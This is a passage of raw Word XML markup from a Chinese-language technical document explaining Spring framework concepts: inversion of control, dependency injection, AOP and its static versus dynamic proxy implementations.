          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DI  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>依赖注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D477F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00D477F8" w:rsidP="009A6B50">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AOP    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>解耦作用、提高代码重用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D477F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00D477F8" w:rsidP="009A6B50">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>事物的处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异常时事务回滚，避免了每次对数据操作都要现获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实例来启动事务</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>回滚事务还有繁琐的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Try/Catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作。这些也就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（面向切面编程）机制很好的应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB63A3" w:rsidRDefault="00D477F8" w:rsidP="009A6B50">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>控制反转</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: IoC</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Inversion of Control</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，控制倒转）。这是</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的核心，贯穿始终。所谓</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IoC</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，对于</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架来说，就是由</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来负责控制对象的生命周期和对象间的关系。所有的类都会在</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>容器中登记，告诉</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>你是什么</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>你需要什么，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>会在系统运行到适当的时候，把你要的东西主动给你</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>同时也把你交给其他需要你的东西。所有的类的创建、销毁都由</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来控制，也就是说控制对象生存周期的不再是引用它的对象，而是</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。对于某个具体的对象而言，以前是它控制其他对象，现在是所有对象都被</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>       IoC</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的一个重点是在系统运行中，</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>动态的向某个对象提供它所需要的其他对象</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。这一点是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DI</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，依赖注入）来实现的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000233C2" w:rsidRDefault="000233C2" w:rsidP="000233C2">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.4.1.1 Spring AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4ABA" w:rsidRDefault="00FB4ABA" w:rsidP="00FB4ABA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的实现方式有两种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB4ABA" w:rsidRDefault="00FB4ABA" w:rsidP="00FB4ABA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架在编译阶段，就对目标类进行修改，得到的</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件已经是被修改过的。生成静态的</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理类（生成</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*.class</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件已经被改掉了，需要使用特定的编译器）。以</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AspectJ</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>为代表</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— </w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>静态</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B81" w:rsidRPr="00FB4ABA" w:rsidRDefault="00FB4ABA" w:rsidP="00FB4ABA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架在运行阶段，动态生成</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理（在内存中动态地生成</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理类），以实现对目标对象的增强。它不需要特殊的编译器。以</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Spring AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>为代表。</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">—— </w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>动态</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidR="009E4B81" w:rsidRPr="00FB4ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000233C2" w:rsidRPr="000233C2" w:rsidRDefault="000233C2" w:rsidP="000233C2"/>
    <w:p w:rsidR="005B078A" w:rsidRPr="00253A60" w:rsidRDefault="005B078A" w:rsidP="00253A60">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00253A60">
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00B510A1" w:rsidRPr="00253A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00253A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00B510A1" w:rsidRPr="00253A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00503814">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00503814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:t>pring</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:t>中怎样实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00253A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B078A" w:rsidRDefault="005B078A" w:rsidP="005B078A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>反射实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> AOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>动态代理模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Spring AOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00534B35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
